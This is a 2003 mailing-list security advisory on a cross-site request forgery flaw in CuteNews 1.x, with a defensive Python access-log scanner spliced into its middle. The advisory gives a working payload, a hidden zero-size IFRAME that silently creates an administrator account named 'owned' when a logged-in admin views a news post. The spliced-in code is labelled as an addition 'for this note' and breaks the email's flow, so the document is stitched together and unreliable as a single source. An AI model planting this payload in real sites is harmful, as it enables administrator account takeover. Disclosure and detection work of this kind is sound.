[VulnWatch] Admin Account Creation Vulnerability in CuteNews 1.x

From: Peter Winter-Smith (peter4020_at_hotmail.com)
Date: 06/29/03

    To: vulnwatch@vulnwatch.org, vuln@secunia.com, bugs@securitytracker.com
    Date: Sun, 29 Jun 2003 09:04:58 +0000
    
    

    Admin Account Creation Vulnerability in CuteNews 1.x

    Url: http://www.cutephp.com

    CuteNews is an efficient, user-friendly and well-designed news system
    which is easy to set up and does not require SQL to function, instead
    creating its own databases.

    It supports multiple user levels, such as Journalist (3), Editor (2)
    and Administrator (1), and has taken precautions to ensure that field
    injection cannot alter the user level, by placing the user level at the
    start of the database record rather than after any given field.

    It does however allow the minor users to post HTML content in their
    posts, which could lead to cross-site scripting cookie 'stealing', but
    luckily the creator has only stored MD5 hashes of the password, so that
    accounts cannot be directly stolen.

    It appears however that CuteNews does not filter urls relating to the
    site itself, or rather the CuteNews control panel.

    Therefore, if a user were to inject the correct commands into a news
    article in a hidden IFRAME, or some such control, then when the
    administrator browsed to the news page after having signed in to
    CuteNews, the commands would be executed and the administrator would be
    none the wiser.

    Example:

    --------------------------------[Start Post]-------------------------------

    Blah, blah, welcome to site.com, etc.

    <iframe
    src="index.php?regusername=owned&regpassword=pass&regnickname=owned&regemail=none@none.com&reglevel=1&action=adduser&mod=editusers"
    height=0 width=0 frameborder=0 scrolling=0></iframe>
    ---------------------------------[End Post]--------------------------------

    If the above data were posted on the news page, the browser of any
    signed-in administrator viewing it would execute the command without
    any notification at all.

    That URL in particular adds an administrator account with the username
    'owned' and the password 'pass'.
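    The request above is a normal control-panel action, so one way to spot abuse of it is to look for adduser requests that arrive from somewhere other than the control panel itself. The following is an added example for this note, not CuteNews code or the author's: it scans constructed combined-format access log lines for GET requests carrying mod=editusers and action=adduser and reports the requested level and whether the Referer points outside the panel path (here assumed to be /cutenews/index.php).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format: ip ident user [time] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (hostname and paths are assumptions, not from the advisory).
SAMPLE_LOG = [
    # An admin adding an editor normally, submitted from the control panel.
    '10.0.0.5 - - [29/Jun/2003:09:01:12 +0000] "GET /cutenews/index.php?mod=editusers'
    '&action=adduser&regusername=bob&regpassword=x&reglevel=2 HTTP/1.1" 200 512 '
    '"http://site.com/cutenews/index.php?mod=editusers" "Mozilla/4.0"',
    # The advisory's URL, fetched while the admin was reading the public news page.
    '10.0.0.5 - - [29/Jun/2003:09:04:58 +0000] "GET /cutenews/index.php?regusername=owned'
    '&regpassword=pass&regnickname=owned&regemail=none@none.com&reglevel=1&action=adduser'
    '&mod=editusers HTTP/1.1" 200 512 "http://site.com/news.php" "Mozilla/4.0"',
    # Unrelated traffic that must be ignored.
    '10.0.0.9 - - [29/Jun/2003:09:05:00 +0000] "GET /news.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
]


def flag_adduser_requests(lines, panel_path="/cutenews/index.php"):
    """Return one finding dict per request that creates a CuteNews user.

    cross_site is True when the Referer does not point at the control panel,
    which is what a request triggered from a news-page IFRAME looks like.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["url"]).query)
        if qs.get("mod") != ["editusers"] or qs.get("action") != ["adduser"]:
            continue
        findings.append({
            "ip": m["ip"],
            "method": m["method"],
            "user": qs.get("regusername", ["?"])[0],
            "level": int(qs.get("reglevel", ["0"])[0] or 0),
            "cross_site": urlsplit(m["referer"]).path != panel_path,
        })
    return findings


if __name__ == "__main__":
    for f in flag_adduser_requests(SAMPLE_LOG):
        print(f)
```

    Findings with level 1 and cross_site set are the ones that match the scenario in this advisory; a missing Referer also counts as cross-site, so expect some noise from privacy-conscious browsers.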

    ================================================================

    Operating system and servicepack level:
    Any operating system.

    Software:
    CuteNews, PHP 4+

    Under what circumstances the vulnerability was discovered:
    Messing around with CuteNews

    If the vendor has been notified:
    Yes.

    How to contact you for further information:
    I can always be reached at peter4020@hotmail.com

    Please credit this find to:
    Peter Winter-Smith

    Thank you for your time,
    -Peter


